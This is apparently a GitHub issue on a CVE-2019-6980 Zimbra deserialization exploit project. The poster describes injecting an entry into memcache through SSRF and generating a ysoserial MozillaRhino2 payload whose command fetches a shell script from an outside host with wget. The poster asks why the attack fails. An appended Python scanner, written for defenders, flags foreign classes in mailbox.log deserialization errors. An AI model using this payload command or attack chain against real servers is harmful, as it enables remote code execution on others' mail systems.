
Deserialization error in the Zimbra_Deserialization_RCE_CVE-2019-6980.py #6

@chenxiaode168

Description


Good morning,

I have tested CVE-2019-6980 on Zimbra version 8.7.10 & 8.7.11 (Free edition) with the latest ysoserial package version 0.0.6.
For both cases, there are some errors observed from the mailbox.log shown below:
com.zimbra.common.service.ServiceException: system failure: Failed to deserialize ImapFolder
xxxxxxx
xxxxxxxxxxxx
Caused by: java.io.InvalidClassException: org.mozilla.javascript.ScriptableObject: local class incompatible: stream classdesc serialVersionUID=xxxxxxxxxxxxxxx, local class serialVersionUID=-xxxxxxxxxxxxxxxxx
xxxxxxxx
xxxxxxxx

From my observation, the zImap entry was successfully inserted into the memcache (Verified) through SSRF, and deserialization occurred when the imap account was logged on (with select inbox, correct folderNo, modseq & uidvalidity).

MozillaRhino2 payload was used in ysoserial to generate the payload (java -jar ysoserial.jar MozillaRhino2 "/usr/bin/wget http://1.2.3.4/test.sh --no-check-certificate -O /tmp/test.sh"). I also tested with MozillaRhino1 but it failed too.

Can you advise what I did wrong here?
What are the exact Zimbra version and ysoserial version that you have tested with? Thank you very much.
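Added example, not code from this issue or from the exploit project: a small Python scanner for the mailbox.log pattern described in the post, pairing each "Failed to deserialize ImapFolder" message with the class named in its InvalidClassException cause, so a defender can tell a foreign class inside the cached ImapFolder entry (as with the Rhino class reported above) from an ordinary serialVersionUID mismatch after an upgrade. The sample log lines, the trusted package prefixes and the Zimbra class name used in the benign case are constructed assumptions.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed mailbox.log excerpt modelled on the lines quoted in the issue;
# timestamps, thread names, IDs and UID values are made up for illustration.
SAMPLE_LOG = """\
2019-03-01 09:12:01,220 WARN [ImapServer-2] [ip=10.0.0.5;] imap - com.zimbra.common.service.ServiceException: system failure: Failed to deserialize ImapFolder
ExceptionId:ImapServer-2:1551431521220:deadbeef
Code:service.FAILURE
Caused by: java.io.InvalidClassException: org.mozilla.javascript.ScriptableObject: local class incompatible: stream classdesc serialVersionUID=1111, local class serialVersionUID=-2222
2019-03-01 09:15:40,001 INFO [ImapServer-3] [ip=10.0.0.6;] imap - SELECT INBOX
2019-03-01 09:16:02,500 WARN [ImapServer-3] [ip=10.0.0.6;] imap - com.zimbra.common.service.ServiceException: system failure: Failed to deserialize ImapFolder
Caused by: java.io.InvalidClassException: com.zimbra.cs.imap.ImapFolder: local class incompatible: stream classdesc serialVersionUID=3333, local class serialVersionUID=4444
"""

DESER_FAIL = re.compile(r"Failed to deserialize ImapFolder")
CAUSE = re.compile(r"Caused by: (?P<exc>[\w.$]+): (?P<cls>[\w.$]+): local class incompatible")
# Packages a legitimately cached ImapFolder graph may reference (assumption);
# any other class named in the cause is a foreign object graph worth an alert.
TRUSTED_PREFIXES = ("com.zimbra.", "java.", "javax.")

@dataclass
class Finding:
    line_no: int       # line of the "Failed to deserialize" message
    exception: str     # e.g. java.io.InvalidClassException
    cls: str           # class named in the root cause
    suspicious: bool   # True when cls is outside TRUSTED_PREFIXES

def scan_mailbox_log(text: str) -> List[Finding]:
    """Pair each ImapFolder deserialization failure with its root-cause class."""
    findings: List[Finding] = []
    pending: Optional[int] = None
    for n, line in enumerate(text.splitlines(), 1):
        if DESER_FAIL.search(line):
            pending = n            # remember the failure until its cause appears
            continue
        m = CAUSE.search(line)
        if m and pending is not None:
            cls = m.group("cls")
            findings.append(Finding(pending, m.group("exc"), cls,
                                    not cls.startswith(TRUSTED_PREFIXES)))
            pending = None         # a cause line closes the open failure
    return findings

if __name__ == "__main__":
    for f in scan_mailbox_log(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.cls} suspicious={f.suspicious}")
```

A benign post-upgrade mismatch names a Zimbra class and is reported with suspicious=False; a cause naming a class outside the trusted packages is the case to investigate together with the memcached entry and the SSRF path the post describes.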
